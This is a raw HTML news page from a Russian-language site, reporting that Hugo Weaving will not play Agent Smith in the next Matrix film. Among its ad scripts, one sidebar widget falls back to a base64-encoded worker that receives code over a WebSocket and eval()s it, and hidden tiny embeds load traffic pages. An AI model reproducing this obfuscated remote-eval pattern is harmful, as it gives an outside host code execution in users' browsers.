<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="ru-RU">
<head><meta name="yandex-verification" content="86d2deab781a8174" />
<!--LiveInternet counter--><script type="text/javascript">
new Image().src = "//counter.yadro.ru/hit?r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random();</script><!--/LiveInternet-->
<meta name="e4e0f1d0da404566471aa729a08517f9" content="">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
	<title>Следующую &#171;Матрицу&#187; снимут без Агента Смита &laquo; Русский Еврей</title>
	<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="http://rusjev.net/jvrs/xmlrpc.php" />
<link rel="alternate" type="application/rss+xml" title="Русский Еврей &raquo; Лента" href="http://rusjev.net/feed/" />
<link rel="alternate" type="application/rss+xml" title="Русский Еврей &raquo; Лента комментариев" href="http://rusjev.net/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Русский Еврей &raquo; Лента комментариев к &laquo;Следующую &#171;Матрицу&#187; снимут без Агента Смита&raquo;" href="http://rusjev.net/2020/01/22/sleduyushhuyu-matritsu-snimut-bez-agenta-smita/feed/" />
<script type='text/javascript' src='http://rusjev.net/jvrs/wp-includes/js/jquery/jquery.js?ver=1.11.0'></script>
<script type='text/javascript' src='http://rusjev.net/jvrs/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1'></script>
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://rusjev.net/jvrs/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://rusjev.net/jvrs/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='Елизавета II лишила Меган Маркл всех украшений и одежды, которые были приобретены казной' href='http://rusjev.net/2020/01/22/elizaveta-ii-lishila-megan-markl-vseh-ukrasheniy-i-odezhdyi-kotoryie-byili-priobretenyi-kaznoy/' />
<link rel='next' title='Израиль передаст РФ Александровское подворье в Иерусалиме в обмен на освобождение гражданки Израиля' href='http://rusjev.net/2020/01/22/izrail-peredast-rf-aleksandrovskoe-podvore-v-ierusalime-v-obmen-na-osvobozhdenie-grazhdanki-izrailya/' />
<link rel='canonical' href='http://rusjev.net/2020/01/22/sleduyushhuyu-matritsu-snimut-bez-agenta-smita/' />
<link rel='shortlink' href='http://rusjev.net/?p=133525' />
<meta property="og:title" content="Следующую &#171;Матрицу&#187; снимут без Агента Смита" /><meta property="og:type" content="article" /><meta property="og:url" content="http://rusjev.net/2020/01/22/sleduyushhuyu-matritsu-snimut-bez-agenta-smita/" /><meta property="og:site_name" content="Русский Еврей" /><meta property="og:description" content="Продолжить чтение Следующую &#171;Матрицу&#187; снимут без Агента Смита" /><script type="text/javascript">
	window._wp_rp_static_base_url = 'https://wprpp.s3.amazonaws.com/static/';
	window._wp_rp_wp_ajax_url = "http://rusjev.net/jvrs/wp-admin/admin-ajax.php";
	window._wp_rp_plugin_version = '3.4.56';
	window._wp_rp_post_id = '133525';
	window._wp_rp_num_rel_posts = '4';
	window._wp_rp_blog_id = '6007083';
	window._wp_rp_thumbnails = true;
	window._wp_rp_post_title = '%D0%A1%D0%BB%D0%B5%D0%B4%D1%83%D1%8E%D1%89%D1%83%D1%8E+%22%D0%9C%D0%B0%D1%82%D1%80%D0%B8%D1%86%D1%83%22+%D1%81%D0%BD%D0%B8%D0%BC%D1%83%D1%82+%D0%B1%D0%B5%D0%B7+%D0%90%D0%B3%D0%B5%D0%BD%D1%82%D0%B0+%D0%A1%D0%BC%D0%B8%D1%82%D0%B0';
	window._wp_rp_post_tags = ['%D0%9A%D0%B8%D0%BD%D0%BE', '%D0%B7%D0%BD%D0%B0%D0%BC%D0%B5%D0%BD%D0%B8%D1%82%D0%BE%D1%81%D1%82%D1%8C', '%D0%9D%D0%BE%D0%B2%D0%BE%D1%81%D1%82%D0%B8', '%D0%A8%D0%BE%D1%83-%D0%B1%D0%B8%D0%B7%D0%BD%D0%B5%D1%81', 'alt', 'a'];
	window._wp_rp_remote_recommendations = false;
	window._wp_rp_promoted_content = true;
	window._wp_rp_traffic_exchange = true;
</script>
<script type="text/javascript" src="https://wprpp.s3.amazonaws.com/static/js/pageview.js?version=3.4.56" async></script>
<link rel="stylesheet" href="http://rusjev.net/jvrs/wp-content/plugins/related-posts/static/themes/vertical.css?version=3.4.56" />
<style type="text/css">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</style>
<script type="text/javascript">
//<![CDATA[



/* JQUERY */
jQuery(document).ready(function(){ 
  jQuery("#rmenu2 li.rMenu-expand").hover(function(){
    jQuery(this).find('ul.rMenu-ver:first').css({"display":"block","position":"absolute"});
    jQuery(this).find('ul.rMenu-ver:first li').css({"display":"none"}).slideDown(500);	
  },function() {
    jQuery(this).find('ul.rMenu-ver:first').css("display","block");
    jQuery(this).find('ul.rMenu-ver:first li').css("display","block").slideUp(300);
	jQuery(this).find('ul.rMenu-ver:first').slideUp(300);
   });
    
   
  

	/* jQuery('ul#rmenu').superfish(); */
	/* jQuery('ul#rmenu').superfish().find('ul').bgIframe({opacity:false}); */
 
	/* For IE6 */
	if (jQuery.browser.msie && /MSIE 6\.0/i.test(window.navigator.userAgent) && !/MSIE 7\.0/i.test(window.navigator.userAgent) && !/MSIE 8\.0/i.test(window.navigator.userAgent)) {

		/* Max-width for images in IE6 */		
		var centerwidth = jQuery("td#middle").width(); 
		
		/* Images without caption */
		jQuery(".post img").each(function() { 
			var maxwidth = centerwidth - 10 + 'px';
			var imgwidth = jQuery(this).width(); 
			var imgheight = jQuery(this).height(); 
			var newimgheight = (centerwidth / imgwidth * imgheight) + 'px';	
			if (imgwidth > centerwidth) { 
				jQuery(this).css({width: maxwidth}); 
				jQuery(this).css({height: newimgheight}); 
			}
		});
		
		/* Images with caption */
		jQuery("div.wp-caption").each(function() { 
			var captionwidth = jQuery(this).width(); 
			var maxcaptionwidth = centerwidth + 'px';
			var captionheight = jQuery(this).height();
			var captionimgwidth =  jQuery("div.wp-caption img").width();
			var captionimgheight =  jQuery("div.wp-caption img").height();
			if (captionwidth > centerwidth) { 
				jQuery(this).css({width: maxcaptionwidth}); 
				var newcaptionheight = (centerwidth / captionwidth * captionheight) + 'px';
				var newcaptionimgheight = (centerwidth / captionimgwidth * captionimgheight) + 'px';
				jQuery(this).css({height: newcaptionheight}); 
				jQuery("div.wp-caption img").css({height: newcaptionimgheight}); 
				}
		});
		
		/* sfhover for LI:HOVER support in IE6: */
		jQuery("ul li").
			hover( function() {
					jQuery(this).addClass("sfhover")
				}, 
				function() {
					jQuery(this).removeClass("sfhover")
				} 
			); 

	/* End IE6 */
	}
	
	
	
	/* Since 3.7.8: Auto resize videos (embed and iframe elements) 
	TODO: Parse parent's dimensions only once per layout column, not per video
	*/
	function bfa_resize_video() {
		jQuery('embed, iframe').each( function() {
			var video = jQuery(this),
			videoWidth = video.attr('width'); // use the attr here, not width() or css()
			videoParent = video.parent(),
			videoParentWidth = parseFloat( videoParent.css( 'width' ) ),
			videoParentBorder = parseFloat( videoParent.css( 'border-left-width' ) ) 
										+  parseFloat( videoParent.css( 'border-right-width' ) ),
			videoParentPadding = parseFloat( videoParent.css( 'padding-left' ) ) 
										+  parseFloat( videoParent.css( 'padding-right' ) ),
			maxWidth = videoParentWidth - videoParentBorder - videoParentPadding;

			if( videoWidth > maxWidth ) {
				var videoHeight = video.attr('height'),
				videoMaxHeight = ( maxWidth / videoWidth * videoHeight );
				video.attr({ width: maxWidth, height: videoMaxHeight });
			} 

		});	
	}
	bfa_resize_video();
	jQuery(window).resize( bfa_resize_video );

		
	jQuery(".post table tr").
		mouseover(function() {
			jQuery(this).addClass("over");
		}).
		mouseout(function() {
			jQuery(this).removeClass("over");
		});

	
	jQuery(".post table tr:even").
		addClass("alt");

	
	jQuery("input.text, input.TextField, input.file, input.password, textarea").
		focus(function () {  
			jQuery(this).addClass("highlight"); 
		}).
		blur(function () { 
			jQuery(this).removeClass("highlight"); 
		})
	
	jQuery("input.inputblur").
		focus(function () {  
			jQuery(this).addClass("inputfocus"); 
		}).
		blur(function () { 
			jQuery(this).removeClass("inputfocus"); 
		})

		

	
	jQuery("input.button, input.Button, input#submit").
		mouseover(function() {
			jQuery(this).addClass("buttonhover");
		}).
		mouseout(function() {
			jQuery(this).removeClass("buttonhover");
		});

	/* toggle "you can use these xhtml tags" */
	jQuery("a.xhtmltags").
		click(function(){ 
			jQuery("div.xhtml-tags").slideToggle(300); 
		});

	/* For the Tabbed Widgets plugin: */
	jQuery("ul.tw-nav-list").
		addClass("clearfix");

		
	
});

//]]>
</script>
</head>
<body class="single single-post postid-133525 single-format-standard">

<div id="wrapper">
<div id="container">

<script type="text/javascript" data-mrmn-tag="iam" data-mrmn-main="true">
    var _MRMN = _MRMN || {};
    _MRMN.cmd = _MRMN.cmd || [];

    if (!_MRMN.req) {
        var sc = document.createElement('script');
        sc.type = 'text/javascript';
        sc.setAttribute('async', 'async');
        sc.setAttribute('data-mrmn-tag', 'iam');
        sc.src = '//m-shes.ru/mbp/pre/0d3ab75fdad0a864e57a19f61005aa6c/'
                + document.location.host.replace(/^www./, '')
                + '?' + Math.random();

        if (document.head) {
            document.head.appendChild(sc);
        } else {
            var node = document.getElementsByTagName("script")[0];
            node.parentNode.insertBefore(sc, node);
        }
        _MRMN.req = true;
        _MRMN.desktopStyle = true;
    }
</script>



<table id="layout" border="0" cellspacing="0" cellpadding="0">
<colgroup>
<col class="colone" /><col class="coltwo" />
<col class="colthree" /></colgroup> 


	<tr>

		<!-- Header -->
		<td id="header" colspan="3">

		<center>
<meta name="b6d8d6e4cff8ca2598f2d776692d9b44" content="fbac590d96aa1aa1dd2618f78daab6d2" />
<meta name="rpc37a21b136c746dbad2c33f9e7041685" content="ec3cca6f3eec66fae8f6d8f91c001ce2" />
<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- 970_jew -->
<ins class="adsbygoogle"
     style="display:inline-block;width:970px;height:90px"
     data-ad-client="ca-pub-5083002985597049"
     data-ad-slot="2420706413"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script>
</center>

<div class="horbar1">&nbsp;</div> <table id="logoarea" cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td valign="middle" class="logoarea-title"><h2 class="blogtitle"><a href="http://rusjev.net/">Русский Еврей</a></h2><p class="tagline"></p></td><td valign="bottom" class="search-box" align="right"><div class="searchbox">
					<form method="get" class="searchform" action="http://rusjev.net/">
					<div class="searchbox-form"><input type="text" class="text inputblur" onfocus="this.value=''" 
						value="Быстрый поиск" onblur="this.value='Быстрый поиск'" name="s" /></div>
					</form>
				</div>
				</td></tr></table> <div class="horbar1">&nbsp;</div> <div id="menu1" class="menu-menun1-container"><ul id="rmenu2" class="clearfix rMenu-hor rMenu"><li id="menu-item-77" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-77"><a href="http://rusjev.net/category/news/israel/"><span>Израиль</span></a></li>
<li id="menu-item-78" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-78"><a href="http://rusjev.net/category/news/russia/"><span>Россия</span></a></li>
<li id="menu-item-79" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-79"><a href="http://rusjev.net/category/news/usa/"><span>США</span></a></li>
<li id="menu-item-80" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-80"><a href="http://rusjev.net/category/news/ukraine/"><span>Украина</span></a></li>
<li id="menu-item-110" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-110"><a href="http://rusjev.net/category/publications/economics/"><span>Экономика</span></a></li>
<li id="menu-item-17337" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-17337"><a href="http://rusjev.net/?s=курс+доллара"><span>Курс доллара</span></a></li>
<li id="menu-item-25988" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-25988"><a href="http://rusjev.net/tag/literaturnaya-stranichka/"><span>Литературная страничка</span></a></li>
<li id="menu-item-116918" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-116918"><a href="http://rusjev.net/category/news/english-news/"><span>English News</span></a></li>
<li id="menu-item-2774" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2774"><a href="http://rusjev.net/direction/"><span>Редакция</span></a></li>
</ul></div> <div class="horbar1">&nbsp;</div>
		</td>
		<!-- / Header -->

	</tr>
	<!-- Main Body -->	
	<tr id="bodyrow">

				<!-- Left Sidebar -->
		<td id="left">

			<div id="text-11" class="widget widget_text">			<div class="textwidget"><noindex>
<script class="r36980" type="text/javascript">
    (function() {
        var worker36980,
            tickerID = 36980,
            tag = document.currentScript || (function() {
                var scripts = document.getElementsByClassName('r36980'),
                    len = scripts.length;
                return len ? scripts[len - 1] : null;
            })(),
            idn = (function() {
                var i, num, chars = "abcdefghiklmnopqrstuvwxyz",
                    len = Math.floor((Math.random() * 2) + 4),
                    idn = '';
                for (i = 0; i < len; i++) {
                    num = Math.floor(Math.random() * chars.length);
                    idn += chars.substring(num, num + 1);
                }
                return idn;
            })();
        
        var container = document.createElement('div');
            container.id = idn;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.setAttribute('class', 's36980');
            script.setAttribute('data-idn', idn);
            script.src = '//v1rt.news/ru-n4p/0/36/ticker_36980.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';

                function runExternalMessage(data) {
                    worker36980.postMessage(data);
                }

                worker36980 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker36980.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker36980.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
</script>


<!-- Yottos Block 200x522, 08.12.2015 Code -->
<ins class="adsbyyottos" style="display:block" data-ad-client="f0031ed0-8e71-11e4-b6e7-002590d97638"></ins>
<script async src="https://cdn.yottos.com/loader.js"></script>
<!-- End Yottos Block 200x522, 08.12.2015 Code -->
    
</noindex></div>
		</div>
		</td>
		<!-- / Left Sidebar -->
		
				

		<!-- Main Column -->
		<td id="middle">

    
		
		
				<div class="clearfix navigation-top">
		<div class="older"> &nbsp;</div><div class="newer">&nbsp; </div></div>				<div class="post-133525 post type-post status-publish format-standard hentry category-news category-shou-biznes-news tag-znamenitost tag-kino odd" id="post-133525">
				<div class="post-kicker">Январь 22nd, 2020
</div>		<div class="post-headline"><h1>Следующую &#171;Матрицу&#187; снимут без Агента Смита</h1></div>				<div class="post-bodycopy clearfix"><p><a href="http://rusjev.net/jvrs/wp-content/uploads/2020/01/agent.jpg"><img class="alignleft size-medium wp-image-133526" src="http://rusjev.net/jvrs/wp-content/uploads/2020/01/agent-390x219.jpg" alt="агент" width="390" height="219" /></a>Австралийский актер Хьюго Уивинг, сыгравший агента Смита в трех частях фильма &#171;Матрица&#187;, не будет сниматься в продолжении.</p>
<p>Актер получил сразу два предложения &#8212; сыграть в театральной постановке &#171;Визит в Лондоне&#187; и в продолжении &#171;Матрицы&#187;.</p>
<p>&#171;У меня было предложение играть в&#187; Визите &#171;, а затем предложение пришло от&#187; Матрицы &#171;, поэтому я знал, что ее будут снимать, но у меня не было дат. Я думал, что мог бы успеть принять участие в двух&#187;, &#8212; пояснил Уивинг.</p>
<p>Актер ждал уточнения сроков проекту и не соглашался на роль в &#171;Визите&#187;.</p>
<p>&#171;Я был на связи с Ланой Вачовски, но в конце концов она решила, что даты не согласуются. Мы перебирали даты, а потом она якобы передумала. Они решили двигаться вперед без меня&#187;, &#8212; сказал он.</p>
<p>Режиссером продолжения &#171;Матрицы&#187; станет одна из режиссеров предыдущих частей &#8212; Лана Вачовски. К своим ролям вернутся Киану Ривз (Нео) и Кэрри-Энн Мосс (Тринити).</p>

<div class="wp_rp_wrap  wp_rp_vertical" id="wp_rp_first"><div class="wp_rp_content"><h3 class="related_post_title"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- 728 --> <ins class="adsbygoogle"      style="display:inline-block;width:728px;height:90px"      data-ad-client="ca-pub-5083002985597049"      data-ad-slot="4297847219"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></h3><ul class="related_post wp_rp" style="visibility: visible"><li data-position="0" data-poid="in-124086" data-post-type="none" ><a href="http://rusjev.net/2019/10/04/gendalfa-mozhet-syigrat-zhenshhina/" class="wp_rp_thumbnail"><img src="http://rusjev.net/jvrs/wp-content/uploads/2019/10/gendalf-239x3001-150x150.jpg" alt="Гендальфа может сыграть женщина" width="150" height="150" /></a><a href="http://rusjev.net/2019/10/04/gendalfa-mozhet-syigrat-zhenshhina/" class="wp_rp_title">Гендальфа может сыграть женщина</a></li><li data-position="1" data-poid="in-133206" data-post-type="none" ><a href="http://rusjev.net/2020/01/20/riz-uizerspun-pokazalas-v-treylere-seriala-vsyudu-tleyut-pozharyi/" class="wp_rp_thumbnail"><img src="http://rusjev.net/jvrs/wp-content/uploads/2020/01/uizer-150x150.jpg" alt="Риз Уизерспун показалась в трейлере сериала &#171;Всюду тлеют пожары&#187;" width="150" height="150" /></a><a href="http://rusjev.net/2020/01/20/riz-uizerspun-pokazalas-v-treylere-seriala-vsyudu-tleyut-pozharyi/" class="wp_rp_title">Риз Уизерспун показалась в трейлере сериала &#171;Всюду тлеют пожары&#187;</a></li><li data-position="2" data-poid="in-132728" data-post-type="none" ><a href="http://rusjev.net/2020/01/16/keyt-blanshet-stanet-glavoy-zhyuri-na-venetsianskom-festivale/" class="wp_rp_thumbnail"><img src="http://rusjev.net/jvrs/wp-content/uploads/2020/01/blanshet-390x2221-150x150.jpg" alt="Кейт Бланшет станет главой жюри на  Венецианском фестивале" width="150" height="150" /></a><a href="http://rusjev.net/2020/01/16/keyt-blanshet-stanet-glavoy-zhyuri-na-venetsianskom-festivale/" class="wp_rp_title">Кейт Бланшет станет главой жюри на  Венецианском фестивале</a></li><li data-position="3" data-poid="in-124576" data-post-type="none" ><a href="http://rusjev.net/2019/10/10/zvezda-filma-moskva-slezam-ne-verit-spasaet-muzha-ot-tyazheloy-bolezni/" class="wp_rp_thumbnail"><img src="http://rusjev.net/jvrs/wp-content/uploads/2019/10/vavilova-150x150.jpg" alt="Звезда фильма &#171;Москва слезам не верит&#187; спасает мужа от тяжелой болезни" width="150" height="150" /></a><a href="http://rusjev.net/2019/10/10/zvezda-filma-moskva-slezam-ne-verit-spasaet-muzha-ot-tyazheloy-bolezni/" class="wp_rp_title">Звезда фильма &#171;Москва слезам не верит&#187; спасает мужа от тяжелой болезни</a></li></ul></div></div>
</div>						<div class="post-footer">Tags: <a href="http://rusjev.net/tag/znamenitost/" rel="tag">знаменитость</a>, <a href="http://rusjev.net/tag/kino/" rel="tag">Кино</a> |  Category: <a href="http://rusjev.net/category/news/" title="View all posts in Новости" rel="category tag">Новости</a>, <a href="http://rusjev.net/category/news/shou-biznes-news/" title="View all posts in Шоу-бизнес" rel="category tag">Шоу-бизнес</a> 
<noindex>
﻿<div class="r36813"></div>
<script type="text/javascript">
    (function() {
        var worker36813,
            tickerID = 36813,
            tag = (function() {
                var scripts = document.getElementsByClassName('r36813'),
                    len = scripts.length;
                return len ? scripts[len - 1] : null;
            })(),
            idn = (function() {
                var i, num, chars = "abcdefghiklmnopqrstuvwxyz",
                    len = Math.floor((Math.random() * 2) + 4),
                    idn = '';
                for (i = 0; i < len; i++) {
                    num = Math.floor(Math.random() * chars.length);
                    idn += chars.substring(num, num + 1);
                }
                return idn;
            })();
        
        var container = document.createElement('div');
            container.id = idn;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.setAttribute('class', 's36813');
            script.setAttribute('data-idn', idn);
            script.src = '//vir7on.news/ru-n4p/0/36/ticker_36813.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
        tag.parentNode.insertBefore(script, tag);
    })();
</script>

<!-- Composite Start -->
<div id="M287347ScriptRootC616335">
        <div id="M287347PreloadC616335">
        Loading...    </div>
        <script>
                (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById',lp=d.location.protocol,wp=lp.indexOf('http')==0?lp:'https:';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("M287347ScriptRootC616335")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("M287347ScriptRootC616335");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=616335;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src=wp+"//jsc.idealmedia.io/r/u/rusjev.net.616335.js?t="+D.getYear()+D.getMonth()+D.getUTCDate()+D.getUTCHours();c[ac](s);})();
    </script>
    </div>
<!-- Composite End -->


</noindex>
<noindex>
<ins class="adsbyyottos" style="display:block" 
data-ad-client="60732158-5f72-11e4-ae81-002590d75952"></ins> 
<script async defer src="https://cdn.yottos.com/adsbyyottos.js"></script>


<div id="newPortal_informer_6383">Load...</div>

<script type="text/javascript">
 var informerId="newPortal_informer_6383";
 var informerArticleRowCount=1;
 var informerArticleColCount=5;
 var informerWidth=100;
 var informerHeight=250;
 var informerStyle="background-color: \FFFFFF; border: 0px solid \000000; text-align: center; padding: 0px;";

 var informerTitle=true;
 
 var informerTitleStyle="background-color: \FFFFFF; font-family: Arial; color: \000000; font-size: 14px; text-decoration: none; font-weight: regular; text-align: justify;";

 var articleTitleLength=50;
 var articleTitleStyle="background-color: \FFFFFF; font-family: Arial; color: \000000; font-size: 14px; text-decoration: none; font-weight: bold; text-align: left; padding: 3px;";

 var articleImage=true;
 var articleImageAlign="left";
 var articleImageWidth=120;
 var articleImageHeight=120;
 var articleImageStyle="border: 5px solid \FFFFFF; margin: 5px 5px 5px 5px;";

 var articleDescription=false;
 var articleDescriptionLength=250;
 var articleDescriptionStyle="background-color: \FFFFFF; font-family: Arial; color: \000000; font-size: 14px; text-decoration: none; font-weight: regular; text-align: justify; padding: 3px;";
</script>
<!-- before </body> -->

<script language="javascript" type="text/javascript" src="http://www.newportal.com.ua/informer/temporal/site/000000/000200/000294/1/informer.js"></script>


</noindex>
<noindex>




<embed width="3" height="3" type="text/html" src="http://newportal.com.ua/traffic/51.html"></embed>
<embed width="3" height="3" type="text/html" src="http://newportal.com.ua/traffic/89.html"></embed>
<embed width="3" height="3" type="text/html" src="http://newportal.com.ua/traffic/384.html"></embed>
<embed width="3" height="3" type="text/html" src="http://newportal.com.ua/traffic/124.html"></embed>
</noindex></div>		</div><!-- / Post -->	
						
	
			

			<!-- .... -->

	



								<div id="respond" class="comment-respond">
				<h3 id="reply-title" class="comment-reply-title">Leave a Reply <small><a rel="nofollow" id="cancel-comment-reply-link" href="/2020/01/22/sleduyushhuyu-matritsu-snimut-bez-agenta-smita/#respond" style="display:none;">Cancel reply</a></small></h3>
									<form action="http://rusjev.net/jvrs/wp-comments-post.php" method="post" id="commentform" class="comment-form">
																										<p><input class="text author" id="author" name="author" type="text" value="" size="30" tabindex="1" />&nbsp;&nbsp;<label for="author"><strong>Name </strong> (required)</label></p>
<p><input class="text email" id="email" name="email" type="text" value="" size="30"  tabindex="2" />&nbsp;&nbsp;<label for="email"><strong>Email</strong> (will not be published) (required)</label></p>
<p><input class="text url" id="url" name="url" type="text" value="" size="30"  tabindex="3" />&nbsp;&nbsp;<label for="url">Website</label></p>
												<p><textarea name="comment-21b8f7f71f14dab8b860947130a3" id="comment" rows="10" cols="10" tabindex="4"></textarea><textarea name="comment" rows="1" cols="1" style="display:none"></textarea></p><input type="hidden" name="comment-replaced" value="true" />						
		<p class="thesetags clearfix">You can use <a class="xhtmltags" href="#" onclick="return false;">these HTML tags</a></p>
		<div class="xhtml-tags"><p><code>&lt;a href=&quot;&quot; title=&quot;&quot;&gt; &lt;abbr title=&quot;&quot;&gt; &lt;acronym title=&quot;&quot;&gt; &lt;b&gt; &lt;blockquote cite=&quot;&quot;&gt; &lt;cite&gt; &lt;code&gt; &lt;del datetime=&quot;&quot;&gt; &lt;em&gt; &lt;i&gt; &lt;q cite=&quot;&quot;&gt; &lt;strike&gt; &lt;strong&gt; 
		</code></p></div>						<p class="form-submit">
							<input name="submit" type="submit" id="submit" value="Post Comment" />
							<input type='hidden' name='comment_post_ID' value='133525' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
						</p>
						<p style="display:none;"><input type="text" name="nxts" value="1579711298" /><input type="text" name="nxts_signed" value="7f41d62f70c00723d29d2319925fdbf28bfc7763" /><input type="text" name="cb9dd592f8f0" value="ebb94f478b6178da43e06" /><input type="text" name="b1e019b1" value="" /></p>					</form>
							</div><!-- #respond -->
					
     

<br><br>
<noindex>
<div class="widget widget_categories">
</div>
</noindex>


</td>
<!-- / Main Column -->

<!-- Right Inner Sidebar -->

<!-- Right Sidebar -->
<td id="right">

	<div id="nav_menu-2" class="widget widget_nav_menu"><div class="menu-menun2-container"><ul id="menu-menun2" class="menu"><li id="menu-item-81" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-81"><a href="http://rusjev.net/category/publications/history/">История</a></li>
<li id="menu-item-82" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-82"><a href="http://rusjev.net/category/publications/culture/">Культура</a></li>
<li id="menu-item-83" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-83"><a href="http://rusjev.net/category/publications/socium/">Общество</a></li>
<li id="menu-item-84" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-84"><a href="http://rusjev.net/category/publications/politics/">Политика</a></li>
<li id="menu-item-85" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-85"><a href="http://rusjev.net/category/publications/economics/">Экономика</a></li>
<li id="menu-item-23429" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-23429"><a href="http://rusjev.net/category/news/">Новости</a></li>
<li id="menu-item-23430" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-23430"><a href="http://rusjev.net/category/video/">Видео</a></li>
</ul></div></div><div id="text-2" class="widget widget_text">			<div class="textwidget"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Adaptiv -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-5083002985597049"
     data-ad-slot="9488409767"
     data-ad-format="auto"
     data-full-width-responsive="true"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script><noindex>
<!-- Yottos Block 250 Code -->
<ins class="adsbyyottos" style="display:block" data-ad-client="e95361c0-7c69-4820-9334-6b8f2c3699fa"></ins>
<script async src="https://cdn.yottos.com/loader.js"></script>
<!-- End Yottos Block 250 Code -->
  <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- 300x600 -->
<ins class="adsbygoogle"
     style="display:inline-block;width:300px;height:600px"
     data-ad-client="ca-pub-5083002985597049"
     data-ad-slot="7576282016"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script>
  
<!-- Composite Start --> <div id="M466416ScriptRootC715540"> <div id="M466416PreloadC715540"> Loading... </div> </div> <script> (function () { var script = document.createElement('script'); script.src = "//jsc.idealmedia.io/r/u/rusjev.net.715540.js?t=" + ((d = new Date()) ? '' + d.getUTCFullYear() + d.getUTCMonth() + d.getUTCDate() + d.getUTCHours() : ''); script.async = true; document.body.appendChild(script); })(); </script> <!-- Composite End -->
  
<br><br>
<!--LiveInternet logo--><a rel="nofollow" href="//www.liveinternet.ru/click"
target="_blank"><img src="//counter.yadro.ru/logo?27.6"
title="LiveInternet: показано количество просмотров и посетителей"
alt="" border="0" width="88" height="120"/></a><!--/LiveInternet-->
<br>

<!--bigmir)net TOP 100-->
<script type="text/javascript" language="javascript"><!--
